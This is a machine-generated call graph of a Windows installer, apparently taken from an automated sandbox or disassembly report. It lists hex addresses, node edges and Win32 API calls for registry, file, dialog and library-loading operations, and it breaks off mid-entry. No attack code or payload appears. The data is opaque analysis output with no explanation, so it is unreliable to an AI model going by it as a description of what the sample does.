DialogBoxParamA 3737->3741 3738->3744 3739->3737 3740->3741 3743 40140b 2 API calls 3741->3743 3742->3744 3743->3744 3744->3644 3745->3580 3746->3628 3747->3594 3749 4035b7 3748->3749 3750 4035a9 CloseHandle 3748->3750 3789 4035e4 3749->3789 3750->3749 3753 40559b 69 API calls 3754 4033d6 OleUninitialize 3753->3754 3754->3602 3754->3603 3755->3634 3756->3646 3758 4059a6 GetTickCount GetTempFileNameA 3757->3758 3759 4030d7 3758->3759 3760 4059d3 3758->3760 3759->3582 3760->3758 3760->3759 3761->3663 3762->3665 3763->3669 3765 402c23 3764->3765 3766 402c0b 3764->3766 3769 402c33 GetTickCount 3765->3769 3770 402c2b 3765->3770 3767 402c14 DestroyWindow 3766->3767 3768 402c1b 3766->3768 3767->3768 3768->3672 3772 402c41 CreateDialogParamA ShowWindow 3769->3772 3773 402c64 3769->3773 3771 4060ce 2 API calls 3770->3771 3774 402c31 3771->3774 3772->3773 3773->3672 3774->3672 3775->3678 3776->3680 3778 403952 3777->3778 3788 405c57 wsprintfA 3778->3788 3780 4039c3 3781 405d1b 18 API calls 3780->3781 3782 4039cf SetWindowTextA 3781->3782 3783 4036fe 3782->3783 3784 4039eb 3782->3784 3783->3702 3784->3783 3785 405d1b 18 API calls 3784->3785 3785->3784 3786->3698 3787->3704 3788->3780 3790 4035f2 3789->3790 3791 4035bc 3790->3791 3792 4035f7 FreeLibrary GlobalFree 3790->3792 3791->3753 3792->3791 3792->3792 3793 40155b 3794 401577 ShowWindow 3793->3794 3795 40157e 3793->3795 3794->3795 3796 40158c ShowWindow 3795->3796 3797 4028cf 3795->3797 3796->3797 3977 40255c 3978 402a1d 18 API calls 3977->3978 3984 402566 3978->3984 3979 4025d0 3980 4059e4 ReadFile 3980->3984 3981 4025d2 3986 405c57 wsprintfA 3981->3986 3983 4025e2 3983->3979 3985 4025f8 SetFilePointer 3983->3985 3984->3979 3984->3980 3984->3981 3984->3983 3985->3979 3986->3979 3798 40205e 3799 402a3a 18 API calls 3798->3799 3800 402065 3799->3800 3801 402a3a 18 API calls 3800->3801 3802 40206f 3801->3802 3803 402a3a 18 API calls 3802->3803 3804 402079 3803->3804 3805 402a3a 18 API calls 3804->3805 3806 402083 3805->3806 3807 402a3a 18 API calls 3806->3807 3808 40208d 3807->3808 3809 4020cc CoCreateInstance 3808->3809 3810 402a3a 18 API calls 3808->3810 3813 4020eb 3809->3813 3815 402193 3809->3815 3810->3809 3811 401423 25 API calls 3812 4021c9 3811->3812 3814 402173 MultiByteToWideChar 3813->3814 3813->3815 3814->3815 3815->3811 3815->3812 3987 40265e 3988 402664 3987->3988 3989 402668 FindNextFileA 3988->3989 3991 40267a 3988->3991 3990 4026b9 3989->3990 3989->3991 3993 405cf9 lstrcpynA 3990->3993 3993->3991 3994 401cde GetDlgItem GetClientRect 3995 402a3a 18 API calls 3994->3995 3996 401d0e LoadImageA SendMessageA 3995->3996 3997 401d2c DeleteObject 3996->3997 3998 4028cf 3996->3998 3997->3998 3999 401662 4000 402a3a 18 API calls 3999->4000 4001 401669 4000->4001 4002 402a3a 18 API calls 4001->4002 4003 401672 4002->4003 4004 402a3a 18 API calls 4003->4004 4005 40167b MoveFileA 4004->4005 4006 40168e 4005->4006 4012 401687 4005->4012 4007 4021c9 4006->4007 4009 405ffd 2 API calls 4006->4009 4008 401423 25 API calls 4008->4007 4010 40169d 4009->4010 4010->4007 4011 405bb4 38 API calls 4010->4011 4011->4012 4012->4008 4020 402364 4021 40236a 4020->4021 4022 402a3a 18 API calls 4021->4022 4023 40237c 4022->4023 4024 402a3a 18 API calls 4023->4024 4025 402386 RegCreateKeyExA 4024->4025 4026 4023b0 4025->4026 4027 4028cf 4025->4027 4028 4023c8 4026->4028 4029 402a3a 18 API calls 4026->4029 4031 402a1d 18 API calls 4028->4031 4033 4023d4 4028->4033 4030 4023c1 lstrlenA 4029->4030 4030->4028 4031->4033 4032 4023ef RegSetValueExA 4035 402405 RegCloseKey 4032->4035 4033->4032 4034 402e9f 36 API calls 4033->4034 4034->4032 4035->4027 4037 401dea 4038 402a3a 18 API calls 4037->4038 4039 401df0 4038->4039 4040 402a3a 18 API calls 4039->4040 4041 401df9 4040->4041 4042 402a3a 18 API calls 4041->4042 4043 401e02 4042->4043 4044 402a3a 18 API calls 4043->4044 4045 401e0b 4044->4045 4046 401423 25 API calls 4045->4046 4047 401e12 ShellExecuteA 4046->4047 4048 401e3f 4047->4048 4049 40466d 4050 404699 4049->4050 4051 40467d 4049->4051 4053 4046cc 4050->4053 4054 40469f SHGetPathFromIDListA 4050->4054 4060 4054d3 GetDlgItemTextA 4051->4060 4056 4046b6 SendMessageA 4054->4056 4057 4046af 4054->4057 4055 40468a SendMessageA 4055->4050 4056->4053 4058 40140b 2 API calls 4057->4058 4058->4056 4060->4055 4061 401eee 4062 402a3a 18 API calls 4061->4062 4063 401ef5 4062->4063 4064 406092 5 API calls 4063->4064 4065 401f04 4064->4065 4066 401f1c GlobalAlloc 4065->4066 4071 401f84 4065->4071 4067 401f30 4066->4067 4066->4071 4068 406092 5 API calls 4067->4068 4069 401f37 4068->4069 4070 406092 5 API calls 4069->4070 4072 401f41 4070->4072 4072->4071 4076 405c57 wsprintfA 4072->4076 4074 401f78 4077 405c57 wsprintfA 4074->4077 4076->4074 4077->4071 4078 4014f0 SetForegroundWindow 4079 4028cf 4078->4079 4080 403ff2 lstrcpynA lstrlenA 4086 4018f5 4087 40192c 4086->4087 4088 402a3a 18 API calls 4087->4088 4089 401931 4088->4089 4090 40559b 69 API calls 4089->4090 4091 40193a 4090->4091 4092 4024f7 4093 402a3a 18 API calls 4092->4093 4094 4024fe 4093->4094 4097 40596c GetFileAttributesA CreateFileA 4094->4097 4096 40250a 4097->4096 4098 4018f8 4099 402a3a 18 API calls 4098->4099 4100 4018ff 4099->4100 4101 4054ef MessageBoxIndirectA 4100->4101 4102 401908 4101->4102 4117 4014fe 4118 401506 4117->4118 4120 401519 4117->4120 4119 402a1d 18 API calls 4118->4119 4119->4120 4121 402b7f 4122 402b8e SetTimer 4121->4122 4125 402ba7 4121->4125 4122->4125 4123 402bfc 4124 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4124->4123 4125->4123 4125->4124 4126 401000 4127 401037 BeginPaint GetClientRect 4126->4127 4128 40100c DefWindowProcA 4126->4128 4130 4010f3 4127->4130 4131 401179 4128->4131 4132 401073 CreateBrushIndirect FillRect DeleteObject 4130->4132 4133 4010fc 4130->4133 4132->4130 4134 401102 CreateFontIndirectA 4133->4134 4135 401167 EndPaint 4133->4135 4134->4135 4136 401112 6 API calls 4134->4136 4135->4131 4136->4135 4144 401b02 4145 402a3a 18 API calls 4144->4145 4146 401b09 4145->4146 4147 402a1d 18 API calls 4146->4147 4148 401b12 wsprintfA 4147->4148 4149 4028cf 4148->4149 4150 402482 4151 402b44 19 API calls 4150->4151 4152 40248c 4151->4152 4153 402a1d 18 API calls 4152->4153 4154 402495 4153->4154 4155 4024b8 RegEnumValueA 4154->4155 4156 4024ac RegEnumKeyA 4154->4156 4158 4026a6 4154->4158 4157 4024d1 RegCloseKey 4155->4157 4155->4158 4156->4157 4157->4158 4160 401a03 4161 402a3a 18 API calls 4160->4161 4162 401a0c ExpandEnvironmentStringsA 4161->4162 4163 401a20 4162->4163 4165 401a33 4162->4165 4164 401a25 lstrcmpA 4163->4164 4163->4165 4164->4165 4166 402283 4167 40228b 4166->4167 4169 402291 4166->4169 4168 402a3a 18 API calls 4167->4168 4168->4169 4170 402a3a 18 API calls 4169->4170 4172 4022a1 4169->4172 4170->4172 4171 4022af 4173 402a3a 18 API calls 4171->4173 4172->4171 4174 402a3a 18 API calls 4172->4174 4175 4022b8 WritePrivateProfileStringA 4173->4175 4174->4171 4176 404e86 4177 404e96 4176->4177 4178 404eaa 4176->4178 4179 404e9c 4177->4179 4188 404ef3 4177->4188 4180 404eb2 IsWindowVisible 4178->4180 4184 404ec9 4178->4184 4182 403f2a SendMessageA 4179->4182 4183 404ebf 4180->4183 4180->4188 4181 404ef8 CallWindowProcA 4185 404ea6 4181->4185 4182->4185 4189 4047dd SendMessageA 4183->4189 4184->4181 4194 40485d 4184->4194 4188->4181 4190 404800 GetMessagePos ScreenToClient SendMessageA 4189->4190 4191 40483c SendMessageA 4189->4191 4192 404834 4190->4192 4193 404839 4190->4193 4191->4192 4192->4184 4193->4191 4203 405cf9 lstrcpynA 4194->4203 4196 404870 4204 405c57 wsprintfA 4196->4204 4198 40487a 4199 40140b 2 API calls 4198->4199 4200 404883 4199->4200 4205 405cf9 lstrcpynA 4200->4205 4202 40488a 4202->4188 4203->4196 4204->4198 4205->4202 3093 402308 3094 402338 3093->3094 3095 40230d 3093->3095 3097 402a3a 18 API calls 3094->3097 3106 402b44 3095->3106 3099 40233f 3097->3099 3098 402314 3100 40231e 3098->3100 3104 402357 3098->3104 3110 402a7a RegOpenKeyExA 3099->3110 3101 402a3a 18 API calls 3100->3101 3102 402325 RegDeleteValueA RegCloseKey 3101->3102 3102->3104 3107 402a3a 18 API calls 3106->3107 3108 402b5d 3107->3108 3109 402b6b RegOpenKeyExA 3108->3109 3109->3098 3117 402aa5 3110->3117 3119 402355 3110->3119 3111 402acb RegEnumKeyA 3112 402add RegCloseKey 3111->3112 3111->3117 3120 406092 GetModuleHandleA 3112->3120 3114 402b02 RegCloseKey 3114->3119 3115 402a7a 5 API calls 3115->3117 3117->3111 3117->3112 3117->3114 3117->3115 3118 402b1d RegDeleteKeyA 3118->3119 3119->3104 3121 4060b8 GetProcAddress 3120->3121 3122 4060ae 3120->3122 3124 402aed 3121->3124 3126 406024 GetSystemDirectoryA 3122->3126 3124->3118 3124->3119 3125 4060b4 3125->3121 3125->3124 3127 406046 wsprintfA LoadLibraryExA 3126->3127 3127->3125 4206 402688 4207 402a3a 18 API calls 4206->4207 4208 40268f FindFirstFileA 4207->4208 4209 4026b2 4208->4209 4212 4026a2 4208->4212 4210 4026b9 4209->4210 4214 405c57 wsprintfA 4209->4214 4215 405cf9 lstrcpynA 4210->4215 4214->4210 4215->4212 4216 401c8a 4217 402a1d 18 API calls 4216->4217 4218 401c90 IsWindow 4217->4218 4219 4019f3 4218->4219 3262 403a0b 3263 403a23 3262->3263 3264 403b5e 3262->3264 3263->3264 3265 403a2f 3263->3265 3266 403b6f GetDlgItem GetDlgItem 3264->3266 3281 403baf 3264->3281 3267 403a3a SetWindowPos 3265->3267 3268 403a4d 3265->3268 3269 403ede 19 API calls 3266->3269 3267->3268 3271 403a52 ShowWindow 3268->3271 3272 403a6a 3268->3272 3273 403b99 SetClassLongA 3269->3273 3271->3272 3276 403a72 DestroyWindow 3272->3276 3277 403a8c 3272->3277 3278 40140b 2 API calls 3273->3278 3274 403c09 3275 403b59 3274->3275 3332 403f2a 3274->3332 3280 403e67 3276->3280 3282 403a91 SetWindowLongA 3277->3282 3283 403aa2 3277->3283 3278->3281 3279 401389 2 API calls 3284 403be1 3279->3284 3280->3275 3291 403e98 ShowWindow 3280->3291 3281->3274 3281->3279 3282->3275 3287 403b4b 3283->3287 3288 403aae GetDlgItem 3283->3288 3284->3274 3289 403be5 SendMessageA 3284->3289 3285 40140b 2 API calls 3302 403c1b 3285->3302 3286 403e69 DestroyWindow EndDialog 3286->3280 3351 403f45 3287->3351 3292 403ac1 SendMessageA IsWindowEnabled 3288->3292 3293 403ade 3288->3293 3289->3275 3291->3275 3292->3275 3292->3293 3295 403aeb 3293->3295 3296 403b32 SendMessageA 3293->3296 3297 403afe 3293->3297 3306 403ae3 3293->3306 3294 405d1b 18 API calls 3294->3302 3295->3296 3295->3306 3296->3287 3299 403b06 3297->3299 3300 403b1b 3297->3300 3345 40140b 3299->3345 3304 40140b 2 API calls 3300->3304 3301 403b19 3301->3287 3302->3275 3302->3285 3302->3286 3302->3294 3305 403ede 19 API calls 3302->3305 3323 403da9 DestroyWindow 3302->3323 3335 403ede 3302->3335 3307 403b22 3304->3307 3305->3302 3348 403eb7 3306->3348 3307->3287 3307->3306 3309 403c96 GetDlgItem 3310 403cb3 ShowWindow KiUserCallbackDispatcher 3309->3310 3311 403cab 3309->3311 3338 403f00 KiUserCallbackDispatcher 3310->3338 3311->3310 3313 403cdd EnableWindow 3316 403cf1 3313->3316 3314 403cf6 GetSystemMenu EnableMenuItem SendMessageA 3315 403d26 SendMessageA 3314->3315 3314->3316 3315->3316 3316->3314 3339 403f13 SendMessageA 3316->3339 3340 405cf9 lstrcpynA 3316->3340 3319 403d54 lstrlenA 3320 405d1b 18 API calls 3319->3320 3321 403d65 SetWindowTextA 3320->3321 3341 401389 3321->3341 3323->3280 3324 403dc3 CreateDialogParamA 3323->3324 3324->3280 3325 403df6 3324->3325 3326 403ede 19 API calls 3325->3326 3327 403e01 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3326->3327 3328 401389 2 API calls 3327->3328 3329 403e47 3328->3329 3329->3275 3330 403e4f ShowWindow 3329->3330 3331 403f2a SendMessageA 3330->3331 3331->3280 3333 403f42 3332->3333 3334 403f33 SendMessageA 3332->3334 3333->3302 3334->3333 3336 405d1b 18 API calls 3335->3336 3337 403ee9 SetDlgItemTextA 3336->3337 3337->3309 3338->3313 3339->3316 3340->3319 3343 401390 3341->3343 3342 4013fe 3342->3302 3343->3342 3344 4013cb MulDiv SendMessageA 3343->3344 3344->3343 3346 401389 2 API calls 3345->3346 3347 401420 3346->3347 3347->3306 3349 403ec4 SendMessageA 3348->3349 3350 403ebe 3348->3350 3349->3301 3350->3349 3352 403f5d GetWindowLongA 3351->3352 3362 403fe6 3351->3362 3353 403f6e 3352->3353 3352->3362 3354 403f80 3353->3354 3355 403f7d GetSysColor 3353->3355 3356 403f90 SetBkMode 3354->3356 3357 403f86 SetTextColor 3354->3357 3355->3354 3358 403fa8 GetSysColor 3356->3358 3359 403fae 3356->3359 3357->3356 3358->3359 3360 403fb5 SetBkColor 3359->3360 3361 403fbf 3359->3361 3360->3361 3361->3362 3363 403fd2 DeleteObject 3361->3363 3364 403fd9 CreateBrushIndirect 3361->3364 3362->3275 3363->3364 3364->3362 4220 40488f GetDlgItem GetDlgItem 4221 4048e1 7 API calls 4220->4221 4230 404af9 4220->4230 4222 404984 DeleteObject 4221->4222 4223 404977 SendMessageA 4221->4223 4224 40498d 4222->4224 4223->4222 4225 4049c4 4224->4225 4229 405d1b 18 API calls 4224->4229 4226 403ede 19 API calls 4225->4226 4231 4049d8 4226->4231 4227 404c89 4232 404c93 SendMessageA 4227->4232 4233 404c9b 4227->4233 4228 404bdd 4228->4227 4237 404c36 SendMessageA 4228->4237 4263 404aec 4228->4263 4234 4049a6 SendMessageA SendMessageA 4229->4234 4230->4228 4235 4047dd 5 API calls 4230->4235 4252 404b6a 4230->4252 4236 403ede 19 API calls 4231->4236 4232->4233 4240 404cb4 4233->4240 4241 404cad ImageList_Destroy 4233->4241 4254 404cc4 4233->4254 4234->4224 4235->4252 4253 4049e6 4236->4253 4243 404c4b SendMessageA 4237->4243 4237->4263 4238 403f45 8 API calls 4244 404e7f 4238->4244 4239 404bcf SendMessageA 4239->4228 4245 404cbd GlobalFree 4240->4245 4240->4254 4241->4240 4242 404e33 4248 404e45 ShowWindow GetDlgItem ShowWindow 4242->4248 4242->4263 4247 404c5e 4243->4247 4245->4254 4246 404aba GetWindowLongA SetWindowLongA 4249 404ad3 4246->4249 4258 404c6f SendMessageA 4247->4258 4248->4263 4250 404af1 4249->4250 4251 404ad9 ShowWindow 4249->4251 4272 403f13 SendMessageA 4250->4272 4271 403f13 SendMessageA 4251->4271 4252->4228 4252->4239 4253->4246 4257 404a35 SendMessageA 4253->4257 4259 404ab4 4253->4259 4260 404a71 SendMessageA 4253->4260 4261 404a82 SendMessageA 4253->4261 4254->4242 4262 40485d 4 API calls 4254->4262 4267 404cff 4254->4267 4257->4253 4258->4227 4259->4246 4259->4249 4260->4253 4261->4253 4262->4267 4263->4238 4264 404e09 InvalidateRect 4264->4242 4265 404e1f 4264->4265 4273 404798 4265->4273 4266 404d2d SendMessageA 4270 404d43 4266->4270 4267->4266 4267->4270 4269 404db7 SendMessageA SendMessageA 4269->4270 4270->4264 4270->4269 4271->4263 4272->4230 4276 4046d3 4273->4276 4275 4047ad 4275->4242 4277 4046e9 4276->4277 4278 405d1b 18 API calls 4277->4278 4279 40474d 4278->4279 4280 405d1b 18 API calls 4279->4280 4281 404758 4280->4281 4282 405d1b 18 API calls 4281->4282 4283 40476e lstrlenA wsprintfA SetDlgItemTextA 4282->4283 4283->4275 3420 401f90 3421 401fa2 3420->3421 3422 402050 3420->3422 3423 402a3a 18 API calls 3421->3423 3425 401423 25 API calls 3422->3425 3424 401fa9 3423->3424 3426 402a3a 18 API calls 3424->3426 3427 4021c9 3425->3427 3428 401fb2 3426->3428 3429 401fc7 LoadLibraryExA 3428->3429 3430 401fba GetModuleHandleA 3428->3430 3429->3422 3431 401fd7 GetProcAddress 3429->3431 3430->3429 3430->3431 3432 402023 3431->3432 3433 401fe6 3431->3433 3434 404f12 25 API calls 3432->3434 3436 401ff6 3433->3436 3438 401423 3433->3438 3434->3436 3436->3427 3437 402044 FreeLibrary 3436->3437 3437->3427 3439 404f12 25 API calls 3438->3439 3440 401431 3439->3440 3440->3436 3441 402410 3442 402b44 19 API calls 3441->3442 3443 40241a 3442->3443 3444 402a3a 18 API calls 3443->3444 3445 402423 3444->3445 3446 40242d RegQueryValueExA 3445->3446 3450 4026a6 3445->3450 3447 402453 RegCloseKey 3446->3447 3448 40244d 3446->3448 3447->3450 3448->3447 3452 405c57 wsprintfA 3448->3452 3452->3447 4284 401490 4285 404f12 25 API calls 4284->4285 4286 401497 4285->4286 4287 406690 4291 4061c8 4287->4291 4288 406b33 4289 406252 GlobalAlloc 4289->4288 4289->4291 4290 406249 GlobalFree 4290->4289 4291->4288 4291->4289 4291->4290 4291->4291 4292 4062c0 GlobalFree 4291->4292 4293 4062c9 GlobalAlloc 4291->4293 4292->4293 4293->4288 4293->4291 4294 401595 4295 402a3a 18 API calls 4294->4295 4296 40159c SetFileAttributesA 4295->4296 4297 4015ae 4296->4297 4298 402616 4299 40261d 4298->4299 4302 40287c 4298->4302 4300 402a1d 18 API calls 4299->4300 4301 402628 4300->4301 4303 40262f SetFilePointer 4301->4303 4303->4302 4304 40263f 4303->4304 4306 405c57 wsprintfA 4304->4306 4306->4302 3557 401717 3558 402a3a 18 API calls 3557->3558 3559 40171e SearchPathA 3558->3559 3560 401739 3559->3560 4307 402519 4308 40252e 4307->4308 4309 40251e 4307->4309 4311 402a3a 18 API calls 4308->4311 4310 402a1d 18 API calls 4309->4310 4312 402527 4310->4312 4313 402535 lstrlenA 4311->4313 4314 405a13 WriteFile 4312->4314 4315 402557 4312->4315 4313->4312 4314->4315 4316 40431c 4317 404348 4316->4317 4318 404359 4316->4318 4377 4054d3 GetDlgItemTextA 4317->4377 4320 404365 GetDlgItem 4318->4320 4327 4043c4 4318->4327 4325 404379 4320->4325 4321 404353 4322 405f64 5 API calls 4321->4322 4322->4318 4323 4044a8 4326 404652 4323->4326 4379 4054d3 GetDlgItemTextA 4323->4379 4324 40438d SetWindowTextA 4329 403ede 19 API calls 4324->4329 4325->4324 4333 405804 4 API calls 4325->4333 4332 403f45 8 API calls 4326->4332 4327->4323 4327->4326 4330 405d1b 18 API calls 4327->4330 4334 4043a9 4329->4334 4335 404438 SHBrowseForFolderA 4330->4335 4331 4044d8 4336 405859 18 API calls 4331->4336 4337 404666 4332->4337 4338 404383 4333->4338 4339 403ede 19 API calls 4334->4339 4335->4323 4340 404450 CoTaskMemFree 4335->4340 4341 4044de 4336->4341 4338->4324 4344 40576b 3 API calls 4338->4344 4342 4043b7 4339->4342 4343 40576b 3 API calls 4340->4343 4380 405cf9 lstrcpynA 4341->4380 4378 403f13 SendMessageA 4342->4378 4346 40445d 4343->4346 4344->4324 4349 404494 SetDlgItemTextA 4346->4349 4353 405d1b 18 API calls 4346->4353 4348 4043bd 4351 406092 5 API calls 4348->4351 4349->4323 4350 4044f5 4352 406092 5 API calls 4350->4352 4351->4327 4360 4044fc 4352->4360 4354 40447c lstrcmpiA 4353->4354 4354->4349 4357 40448d lstrcatA 4354->4357 4355 404538 4381 405cf9 lstrcpynA 4355->4381 4357->4349 4358 40453f 4359 405804 4 API calls 4358->4359 4361 404545 GetDiskFreeSpaceA 4359->4361 4360->4355 4363 4057b2 2 API calls 4360->4363 4365 404590 4360->4365 4364 404569 MulDiv 4361->4364 4361->4365 4363->4360 4364->4365 4366 404601 4365->4366 4367 404798 21 API calls 4365->4367 4368 404624 4366->4368 4370 40140b 2 API calls 4366->4370 4369 4045ee 4367->4369 4382 403f00 KiUserCallbackDispatcher 4368->4382 4372 404603 SetDlgItemTextA 4369->4372 4373 4045f3 4369->4373 4370->4368 4372->4366 4375 4046d3 21 API calls 4373->4375 4374 404640 4374->4326 4383 4042b1 4374->4383 4375->4366 4377->4321 4378->4348 4379->4331 4380->4350 4381->4358 4382->4374 4384 4042c4 SendMessageA 4383->4384 4385 4042bf 4383->4385 4384->4326 4385->4384 4386 40149d 4387 4014ab PostQuitMessage 4386->4387 4388 40226e 4386->4388 4387->4388 2986 401b23 2987 401b30 2986->2987 2988 401b74 2986->2988 2989 401bb8 2987->2989 2994 401b47 2987->2994 2990 401b78 2988->2990 2991 401b9d GlobalAlloc 2988->2991 2993 405d1b 18 API calls 2989->2993 2999 40226e 2989->2999 2990->2999 3025 405cf9 lstrcpynA 2990->3025 3005 405d1b 2991->3005 2995 402268 2993->2995 3023 405cf9 lstrcpynA 2994->3023 3026 4054ef 2995->3026 2997 401b8a GlobalFree 2997->2999 3000 401b56 3024 405cf9 lstrcpynA 3000->3024 3003 401b65 3030 405cf9 lstrcpynA 3003->3030 3022 405d28 3005->3022 3006 405f4b 3007 405f60 3006->3007 3047 405cf9 lstrcpynA 3006->3047 3007->2989 3009 405dc9 GetVersion 3009->3022 3010 405f22 lstrlenA 3010->3022 3012 405d1b 10 API calls 3012->3010 3015 405e41 GetSystemDirectoryA 3015->3022 3016 405e54 GetWindowsDirectoryA 3016->3022 3018 405d1b 10 API calls 3018->3022 3019 405ecb lstrcatA 3019->3022 3020 405e88 SHGetSpecialFolderLocation 3021 405ea0 SHGetPathFromIDListA CoTaskMemFree 3020->3021 3020->3022 3021->3022 3022->3006 3022->3009 3022->3010 3022->3012 3022->3015 3022->3016 3022->3018 3022->3019 3022->3020 3031 405be0 RegOpenKeyExA 3022->3031 3036 405f64 3022->3036 3045 405c57 wsprintfA 3022->3045 3046 405cf9 lstrcpynA 3022->3046 3023->3000 3024->3003 3025->2997 3028 405504 3026->3028 3027 405550 3027->2999 3028->3027 3029 405518 MessageBoxIndirectA 3028->3029 3029->3027 3030->2999 3032 405c51 3031->3032 3033 405c13 RegQueryValueExA 3031->3033 3032->3022 3034 405c34 RegCloseKey 3033->3034 3034->3032 3037 405f70 3036->3037 3039 405fcd CharNextA 3037->3039 3040 405fd8 3037->3040 3043 405fbb CharNextA 3037->3043 3044 405fc8 CharNextA 3037->3044 3048 405796 3037->3048 3038 405fdc CharPrevA 3038->3040 3039->3037 3039->3040 3040->3038 3041 405ff7 3040->3041 3041->3022 3043->3037 3044->3039 3045->3022 3046->3022 3047->3007 3049 40579c 3048->3049 3050 4057af 3049->3050 3051 4057a2 CharNextA 3049->3051 3050->3037 3051->3049 4389 404027 4390 40403d 4389->4390 4395 404149 4389->4395 4393 403ede 19 API calls 4390->4393 4391 4041b8 4392 40428c 4391->4392 4394 4041c2 GetDlgItem 4391->4394 4398 403f45 8 API calls 4392->4398 4396 404093 4393->4396 4400 4041d8 4394->4400 4401 40424a 4394->4401 4395->4391 4395->4392 4397 40418d GetDlgItem SendMessageA 4395->4397 4399 403ede 19 API calls 4396->4399 4420 403f00 KiUserCallbackDispatcher 4397->4420 4403 404287 4398->4403 4404 4040a0 CheckDlgButton 4399->4404 4400->4401 4405 4041fe 6 API calls 4400->4405 4401->4392 4406 40425c 4401->4406 4418 403f00 KiUserCallbackDispatcher 4404->4418 4405->4401 4409 404262 SendMessageA 4406->4409 4410 404273 4406->4410 4407 4041b3 4412 4042b1 SendMessageA 4407->4412 4409->4410 4410->4403 4411 404279 SendMessageA 4410->4411 4411->4403 4412->4391 4413 4040be GetDlgItem 4419 403f13 SendMessageA 4413->4419 4415 4040d4 SendMessageA 4416 4040f2 GetSysColor 4415->4416 4417 4040fb SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4415->4417 4416->4417 4417->4403 4418->4413 4419->4415 4420->4407 4421 401ca7 4422 402a1d 18 API calls 4421->4422 4423 401cae 4422->4423 4424 402a1d 18 API calls 4423->4424 4425 401cb6 GetDlgItem 4424->4425 4426 402513 4425->4426 4426->4426 3129 40192a 3130 40192c 3129->3130 3131 402a3a 18 API calls 3130->3131 3132 401931 3131->3132 3135 40559b 3132->3135 3176 405859 3135->3176 3138 4055c3 DeleteFileA 3143 40193a 3138->3143 3139 405712 3139->3143 3208 405ffd FindFirstFileA 3139->3208 3140 4055da 3140->3139 3190 405cf9 lstrcpynA 3140->3190 3142 405600 3144 405613 3142->3144 3145 405606 lstrcatA 3142->3145 3191 4057b2 lstrlenA 3144->3191 3148 405619 3145->3148 3149 405627 lstrcatA 3148->3149 3150 40561e 3148->3150 3152 405632 lstrlenA FindFirstFileA 3149->3152 3150->3149 3150->3152 3154 405708 3152->3154 3174 405656 3152->3174 3153 405730 3211 40576b lstrlenA CharPrevA 3153->3211 3154->3139 3156 405796 CharNextA 3156->3174 3158 405553 5 API calls 3159 405742 3158->3159 3160 405746 3159->3160 3161 40575c 3159->3161 3160->3143 3165 404f12 25 API calls 3160->3165 3162 404f12 25 API calls 3161->3162 3162->3143 3163 4056e7 FindNextFileA 3166 4056ff FindClose 3163->3166 3163->3174 3167 405753 3165->3167 3166->3154 3168 405bb4 38 API calls 3167->3168 3171 40575a 3168->3171 3170 40559b 62 API calls 3170->3174 3171->3143 3172 404f12 25 API calls 3172->3163 3173 404f12 25 API calls 3173->3174 3174->3156 3174->3163 3174->3170 3174->3172 3174->3173 3195 405cf9 lstrcpynA 3174->3195 3196 405553 3174->3196 3204 405bb4 MoveFileExA 3174->3204 3214 405cf9 lstrcpynA 3176->3214 3178 40586a 3215 405804 CharNextA CharNextA 3178->3215 3181 4055bb 3181->3138 3181->3140 3182 405f64 5 API calls 3188 405880 3182->3188 3183 4058ab lstrlenA 3184 4058b6 3183->3184 3183->3188 3185 40576b 3 API calls 3184->3185 3187 4058bb GetFileAttributesA 3185->3187 3186 405ffd 2 API calls 3186->3188 3187->3181 3188->3181 3188->3183 3188->3186 3189 4057b2 2 API calls 3188->3189 3189->3183 3190->3142 3192 4057bf 3191->3192 3193 4057d0 3192->3193 3194 4057c4 CharPrevA 3192->3194 3193->3148 3194->3192 3194->3193 3195->3174 3221 405947 GetFileAttributesA 3196->3221 3199 405580 3199->3174 3200 405576 DeleteFileA 3202 40557c 3200->3202 3201 40556e RemoveDirectoryA 3201->3202 3202->3199 3203 40558c SetFileAttributesA 3202->3203 3203->3199 3205 405bd5 3204->3205 3206 405bc8 3204->3206 3205->3174 3224 405a42 lstrcpyA 3206->3224 3209 406013 FindClose 3208->3209 3210 40572c 3208->3210 3209->3210 3210->3143 3210->3153 3212 405736 3211->3212 3213 405785 lstrcatA 3211->3213 3212->3158 3213->3212 3214->3178 3216 40581f 3215->3216 3219 40582f 3215->3219 3217 40582a CharNextA 3216->3217 3216->3219 3220 40584f 3217->3220 3218 405796 CharNextA 3218->3219 3219->3218 3219->3220 3220->3181 3220->3182 3222 40555f 3221->3222 3223 405959 SetFileAttributesA 3221->3223 3222->3199 3222->3200 3222->3201 3223->3222 3225 405a90 GetShortPathNameA 3224->3225 3226 405a6a 3224->3226 3228 405aa5 3225->3228 3229 405baf 3225->3229 3251 40596c GetFileAttributesA CreateFileA 3226->3251 3228->3229 3231 405aad wsprintfA 3228->3231 3229->3205 3230 405a74 CloseHandle GetShortPathNameA 3230->3229 3232 405a88 3230->3232 3233 405d1b 18 API calls 3231->3233 3232->3225 3232->3229 3234 405ad5 3233->3234 3252 40596c GetFileAttributesA CreateFileA 3234->3252 3236 405ae2 3236->3229 3237 405af1 GetFileSize GlobalAlloc 3236->3237 3238 405b13 3237->3238 3239 405ba8 CloseHandle 3237->3239 3253 4059e4 ReadFile 3238->3253 3239->3229 3244 405b32 lstrcpyA 3246 405b54 3244->3246 3245 405b46 3247 4058d1 4 API calls 3245->3247 3248 405b8b SetFilePointer 3246->3248 3247->3246 3260 405a13 WriteFile 3248->3260 3251->3230 3252->3236 3254 405a02 3253->3254 3254->3239 3255 4058d1 lstrlenA 3254->3255 3256 405912 lstrlenA 3255->3256 3257 40591a 3256->3257 3258 4058eb lstrcmpiA 3256->3258 3257->3244 3257->3245 3258->3257 3259 405909 CharNextA 3258->3259 3259->3256 3261 405a31 GlobalFree 3260->3261 3261->3239 4434 4028aa SendMessageA 4435 4028c4 InvalidateRect 4434->4435 4436 4028cf 4434->4436 4435->4436 3526 4015b3 3527 402a3a 18 API calls 3526->3527 3528 4015ba 3527->3528 3529 405804 4 API calls 3528->3529 3541 4015c2 3529->3541 3530 40161c 3532 401621 3530->3532 3533 40164a 3530->3533 3531 405796 CharNextA 3531->3541 3534 401423 25 API calls 3532->3534 3535 401423 25 API calls 3533->3535 3536 401628 3534->3536 3542 401642 3535->3542 3553 405cf9 lstrcpynA 3536->3553 3540 401633 SetCurrentDirectoryA 3540->3542 3541->3530 3541->3531 3543 401604 GetFileAttributesA 3541->3543 3545 405472 3541->3545 3548 4053d8 CreateDirectoryA 3541->3548 3554 405455 CreateDirectoryA 3541->3554 3543->3541 3546 406092 5 API 